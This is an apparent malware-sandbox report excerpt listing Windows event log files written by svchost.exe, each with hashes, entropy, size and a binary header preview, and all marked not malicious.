Preview:	ElfChnk.........#...............#........... ..............................................................................\.f................T.......................\|...=...........................................................................................................................f...............?...........................m...................M...F.......................................-...'...............&.......................................................................................*.. ............#................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.2909571978750325
Encrypted:	false
SSDEEP:	384:Ny2/hDGCyCkCzCRCFCNClCuC6CoC9rC6CdCsCvCkxCkC5CCCWCxCIC/CbCFC5CkG:Ny2/dm1sR
MD5:	B0BF4D9EC91ABBDA5D328631B125A5C0
SHA1:	E672D69127AE7C1A51046ADAA911871EC0C10ABB
SHA-256:	8DBE6F5B80B3D973BBF1177BCCAA690B9F90FC99DC358B7DE66175317C733501
SHA-512:	3132E1FCC5C8F88BD974465EA1E644CA89C2D9E041E49F8A1F48B9ACB3376F0A1042F5CB6FDFC6BE2934C4483312C35539D64DB25B892388604F9F637074BCBD
Malicious:	false
Preview:	ElfChnk.U.......~.......U.......~....................}/.....................................................................@..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................v..................................**..0...U.........Df..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.488768580471203
Encrypted:	false
SSDEEP:	1536:Q9YcieRoUlafdbkKKMAQ2SomvXCQv/2ketsvQPh8YzSJoh2VgPIEF6uq9GgCVRlW:Q9YcieRoUlaFbkKKMAQ2SomvXCM/2keU
MD5:	E3FB1708C64D250E4D801AFB8688DF35
SHA1:	8B889F0358683733257411E451A86E3A1D42159D
SHA-256:	0B62FDD9A57B1809D79561AE64BE30DD7430815D6954A5E3DF90E29E1B2E6C72
SHA-512:	2F5CC514B180A39E5961452A594FE5384A6369CBCB7A1CEBAC37948770A6CB999A2E2F26A32240058D5D7A335904DAF40C88F1C096D8F85907F23E9B32E79ABE
Malicious:	false
Preview:	ElfChnk.........$...............$.....................w.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................V...................................**................o...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.497664742301162
Encrypted:	false
SSDEEP:	1536:9cRFkL1TWX0gkB/J7oasEfyk2/vKlqRi/PgTZSXwyvy8fJpfrAW+Cr6SXlUr20G8:9cRFkL1TWX0gkB/J7oasEfyk2/vKlqk0
MD5:	39D50AC0A6FB19B10351B0B95864C553
SHA1:	C3226D2043EC640AB3DEB9126CA837BB64C6267A
SHA-256:	67DD28B8A168FBFC6E3CF184443D299D40E7DA612828E0E1106F57F9BF8CB794
SHA-512:	345DA4736EEA092AD079D82232DB958C7CBA18B5D96805A81E2A31C7C8D442FE3715BCE5D69764C3AB0F71F94FA9416A3C2A363B228AF1A5A1A4EE9AF3AA9F62
Malicious:	false
Preview:	ElfChnk.>...............>...........................=3.z....................................................................6WY ................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................A...............&...i.......~......................**......>........Q.U..............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.495116691902589
Encrypted:	false
SSDEEP:	384:ShN7s7o787l7r787a7J7z7+7N17g7x7o7g7gY7hZ7D7k7F7r7wm7NP7Y7+7fa7lX:S9HuCg
MD5:	8F5FACAEC835E59EB086543AA14D1E5D
SHA1:	9C7A60C39666234A41FCAE59B937DC293D78D89E
SHA-256:	E6452075DCD968D2B4CC467515B3D7BA3AAF671A5132D6D40B87D1E50E4C876A
SHA-512:	1D965EA89653B71D11BE8AEF985E718E869D8AAEC6C055F999CDC8A63ACD28FA39E7C4A6979B7D2024F3DE39466296B852279223FBC6935D635F0189E58C0240
Malicious:	false
Preview:	ElfChnk.Y.......g.......Y.......g............%...&..J]......................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F...........................................=...............&...............................................................s.......................**......Y........................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.1499045494600955
Encrypted:	false
SSDEEP:	384:Dhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauind:D6Ovc0S5UyEeDgLslstY
MD5:	2045FB0D54CA8F456B545859B9F9B0A8
SHA1:	35854F87588C367DE32A3931E01BC71535E3F400
SHA-256:	E4305D5E1125E185F25AABA6FF9E32DE70B4EFD7264FE5A0C7C2EF3C33989C45
SHA-512:	013CAC4CBF67C9AB5D2A07E771BAF81950E5A256F379E3C2E26CC9E8E47379579470CC6FD56E93B31C4D17935713D1FC6026307427D77CBE9647139E3D73AC47
Malicious:	false
Preview:	ElfChnk.........;...............;...........xk...m...+.....................................................................F.~.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................6f..w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8164696340947971
Encrypted:	false
SSDEEP:	384:jhGuZumutu4uEu5uOuDuyb2uPu1uRu3uGuHu9/u:jr
MD5:	1AB19FA472669F4334C7A9D44E94E1B3
SHA1:	F71C16706CFA9930045C9A888FDB3EF46CACC5BC
SHA-256:	549D89A256E3C71AFCBF551EC9BEDBDB3CF2DC74B4F8C214FDC1D270FB731F6E
SHA-512:	72F1F20CB1F2984B318E4A2AAEE11D573441A77D04C0577D24E19F89E85F1691CB29EF569BD25EBBBD313C7B9DB945DB43D52EEFC2EF33E7BEECDFB8E0BBC404
Malicious:	false
Preview:	ElfChnk...................................... ..x$../..........................................................................<................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................!..................................**..............Wy.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9855903635327656
Encrypted:	false
SSDEEP:	384:cxNhPALAb/A0D6AKAlAfyVAQhAQueA4AIAwA0AYAwA+/AfAjrA3DA:cxN90yzXd
MD5:	7BCA54AC75C7185ADFBB42B1A84F86E3
SHA1:	AD91EE55A6F9F77AD871ACA9A5B59987CA679968
SHA-256:	A43B1365211A968B4EC3F9EC7489D05AD9EED30D3EE0CCD89860D20DFE1914D4
SHA-512:	79A04DCE951528E09F7580E797E38D58CFC556EFEC032C3E68C701D720E01CBDCA3D4F27C309D50B9096570787A0E62B2C69236D148AC9C216CB13AA05E9619F
Malicious:	false
Preview:	ElfChnk.....................................P+...,...0........................................................................9.................B.......................j...=...........................................................................................................................f...............?...........................m...................M...F...........................U.......................%%......&...................................................>...........................E.......**..............o.m...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.165454452307923
Encrypted:	false
SSDEEP:	384:ghVpIcpBUpBxpBapB3pBEpBZpBKpBV1pBApBppBTSpBcu1pBspBlpBABpB7pB0py:gd+uXvB
MD5:	B6B6F199DA64422984403D7374F32528
SHA1:	980D66401DFCCF96ADDDAF22334A5CE735554E7F
SHA-256:	8F65F81EE28F48B5007E04842ACC9DE20794A59E2759C2F35F7C10730A1EF7BF
SHA-512:	5B0EFBF1C57BACF347790EB5915AFCFDDDDAFA7761D94DF1341C4E79F5B16DA3FAC2C9653C3DC41B80E31EA44AE46F4FC95C6EC0FFA0A0D3C05C69CED6955DE4
Malicious:	false
Preview:	ElfChnk.........'...............'...........P.......H:Z.....................................................................gO.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................f..................................**..............m.................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.8519554794255333
Encrypted:	false
SSDEEP:	384:WhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBZ:WwDoh1VqKVvcVU
MD5:	4140628CA3CEC29C0B506CEEBDF684F6
SHA1:	A2B70496C8E91D8E78AA04976B25D850ABAC6E1C
SHA-256:	1823149759A2F1771ACE7B6BE14A0FEFC6F93DD9F81AC1024E6B41C2CCBFD8B0
SHA-512:	779A04771A8E9B2F501FE1251F0D56C5B5988911F6067082D84FF1DBCF5D9281E32DF6CC2C995843EA1FCED748548DC116706E0F738B6510B47C2B3A0EBAA126
Malicious:	false
Preview:	ElfChnk.\...............\.......................0..../........................................................................v.......................................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..............*..8...\........=..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1642919553794224
Encrypted:	false
SSDEEP:	384:bhwCCRzCaCkClCzCYC/CyCVCGCMCvCNCACCxC/CLCoiC:bKFb
MD5:	D7EECF043241FDB9486580582E208603
SHA1:	045D5672A8E9884B78CD31C52D372375503CBF4F
SHA-256:	6F3BE76FC00FE21C18A904058F2AF850204488187187C9B8C4BF11EAA03EC6C0
SHA-512:	6738CD1D4081AD78CCC1E3E7AC46A394D9AC32906B4688E34DCCBBA42153FB826484C854F42FFF619DC8D50CAE708585B422F3EAA3A0219AAD19DC0962910125
Malicious:	false
Preview:	ElfChnk.....................................02..h6...u'.....................................................................1..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................V2............................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.576079103773187
Encrypted:	false
SSDEEP:	768:oQvIZi8Ns5iLV8gRai8ZijiTEOmGkoeiDpbq:Vm+Jao7mce8p2
MD5:	5096A411FC8DE7A2EFE92D23786E1D4C
SHA1:	DA92531A9728B9F56DCF5148A2C40C92A9FD4758
SHA-256:	617D84832BBDD349A4E2D0FC818A40AAF4C6F637149839DEBCB32E522D9D6AEC
SHA-512:	37E6AD0C7429FBE8358803D723D827FD434005106171FC4008AFE45FECAD93997C0E26EED4C7B90A21E054C663463B720F6F169CF8263715041807AFCA33AD91
Malicious:	false
Preview:	ElfChnk.........................................."...9.Z....................................................................B.. ........................................4...=...........................................................................................................................f...............?...........................m...................M...F...........................................................U...................................................&...................................**..0...........\|R...............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.178629627614653
Encrypted:	false
SSDEEP:	384:shL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmNUmtUmxUmLjUm:sY7Lu
MD5:	FCEF23A3691F5D78A27C76D95B2F5ACA
SHA1:	E3F120D9DB395881D78867302DB16507D5C80E6C
SHA-256:	F0E54B18E4C12AF5DBBA107ACAF7F6DA974A72AF12B7AD22BB1AD9D9A6BAB2C7
SHA-512:	63F56C9337D1DE757655594F51B967EC4D3F7CD2CF28E4F75AC3123A2B5B11A33B343B85EEE1BB7C1C6482EE0AEC91B5E7B72502F0E15310F86E810DEC155C67
Malicious:	false
Preview:	ElfChnk....................................../..(4....\.....................................................................G................... .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&..................................................................................../..................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.2040196879846349
Encrypted:	false
SSDEEP:	48:MVW4XrP+MZQNRBEZWTENO4bpBkoDlgD/6FgVt:A5KNVaO80oZgD/6Fg
MD5:	874B3F865EE985A801125E4649C849FE
SHA1:	20E2318217B84C7180FB988DFD93F3F5943D9808
SHA-256:	CAF7DB29DB1E6C58EC894D5242E0692BE134FF4845F12A0DC03BA439B34486A6
SHA-512:	794C55E71C3570120620395E78E26729A6178F36588CF19B2CA976ADB7F100FB14E2318998EC4983FFA6D2EA92E6C9EBB54003AB7647DBE72DA34136A28B7106
Malicious:	false
Preview:	ElfChnk.............................................B........................................................................5.O................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**...............................&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.6469884746870727
Encrypted:	false
SSDEEP:	384:/hpivNiGiriPiYiriDfiS83i0iGiTiYiUisiuiZi+iTiciUiQiJiUiBi4i/iAixQ:/G7t8H
MD5:	FC81D9FBA555C6BC7223594B8F6B46DE
SHA1:	971F47CFC0E1DCA462928DA2D8BE2B16D5A0629C
SHA-256:	9933922E09C49C5BA80292C4AED9EC9F457031E90B28B421DFFBD2F1BB840671
SHA-512:	7F2705E7526B49F76C5F2A76A88B83FC10591BAD68B451F5C67F841322076D4B408FC515EA59E0919907C73CBBD149AB5B5EE981083A52C9E90EC9FBFAD5254F
Malicious:	false
Preview:	ElfChnk.y...............y................... Q..(S...b.......................................................................t..............................................=.......................#...................................................................................................f...............?.......................P.......................M...F...............................................................................................................VG..................................**......y..........:............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.4067373813600383
Encrypted:	false
SSDEEP:	768:hWa0NPaDaLaPa3ababafa3ananabaHaXarafa7ajaHajaTavaO6a3ajaPa7aXafC:KNH
MD5:	C9086547BF5F9E822F359679E7F67F40
SHA1:	2127B927EF9B279FC383FEE43C8B44E92864FF85
SHA-256:	327257210F79945FB3AE7D54F04FC2BE85846177A9CEE0499AFC206F6DE5F944
SHA-512:	887882FA560420B90E0D5214C5025BFB3BFF2D1B3670F4E4957CFA65531E2524F2E41E651B61AABCBCB89613038BF5AFEE0CBFF582EA520956172D1337C31D24
Malicious:	false
Preview:	ElfChnk.........@...............@...............`......s......................................................................h................`...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................9...................................**..H.............0...............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3132453844344478
Encrypted:	false
SSDEEP:	384:hhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJnXJRXJtXJLXJjXJppXJ:hQ0yUkNYwD8imLE5nTtFpf
MD5:	6237EE0458A0478242B975E9BB7AA97D
SHA1:	6B0BDBA887DA21675A63FC73AED995B1BCA3F6B1
SHA-256:	C8E224C54278C206302EAD7011ACC48CAC60E7638E32EE70653190DBC90FA70A
SHA-512:	56C025C971F77AB8E911E0190E8AB5CF533A909C1BF4558876FB2761AAA381CB7D21E44A3273FA4427CB2FF7DEECC15A312DD2A424B96ABDC4886BDF233F30E9
Malicious:	false
Preview:	ElfChnk......................................<...A.........................................................................i,.q................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................<......C...........................**..............@V.$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.325262033408211
Encrypted:	false
SSDEEP:	384:6hYmn9moomUmKBmZOmZmlmmmomRmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfO:6/fGTDcx
MD5:	D13189B45679E53F5744A4D449F8B00F
SHA1:	ED410CAB42772E329F656B4793B46AC7159CF05B
SHA-256:	BAA80D6A7DC42752766B1862A00009A1D76B57022A4D5A89692DBA2D6866EBA1
SHA-512:	83399CE082F8C6D2917B8363E053C770F2783B3D086F39736919FBFA533DF65993A3B7840A2E1000B08948584CF9750C27961BF8A7BE3A235B5DDD779616013F
Malicious:	false
Preview:	ElfChnk.....................................h.................................................................................-.................X...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................1...........&.......................................................................................**..x...........~_g...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7947046118743749
Encrypted:	false
SSDEEP:	384:jhr2zS2o202AW2D2t2l292l2V2p2d2N2:j8Q
MD5:	55E73A924B170FBFFF862E8E195E839A
SHA1:	3C625D05DFC08AE9DF26AEBAA82D72FC9F28ADB0
SHA-256:	1B36D85AA56A023F6646D6EF28C9DCB5358528274EDCC9B6ED20705E3007E8A2
SHA-512:	E14D32569F37A827EDBD1F02667866431C856D087A396933DE5E9B87943369C4802D220557050C7B0FE9367FBD0683676776E6D3CCBCB290C9F30D86EC529E28
Malicious:	false
Preview:	ElfChnk...................................... ..X"...........................................................................?.................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................3...........................&.......................................................................................**................................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WER-PayloadHealth%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 9, DIRTY
Category:	dropped
Size (bytes):	84544
Entropy (8bit):	2.0943351215716235
Encrypted:	false
SSDEEP:	1536:YMpP9JcY6+g4+Ga67MpP9JcY6+g4+Ga6DMpP9JcY6+g4+Ga6F:YMpP9JcY6+g4+Ga67MpP9JcY6+g4+Gah
MD5:	6B97F9A35583E15C3DC8274B3F0A7C72
SHA1:	3EF206DEA358D780843CCAA28B9A40181546FB14
SHA-256:	543F899BE6482935B952D0867AF10C6B064E23D934EF374AFD55DAA67B3A8155
SHA-512:	A8212DFF9DFF9B6241868C752FF84024ED6A61A2767838AC1FA983C768F7DF2A38D7119850556AC3AC95D991024A2F5E1330779B6032C6CF0FFF627E7A48CBA5
Malicious:	false
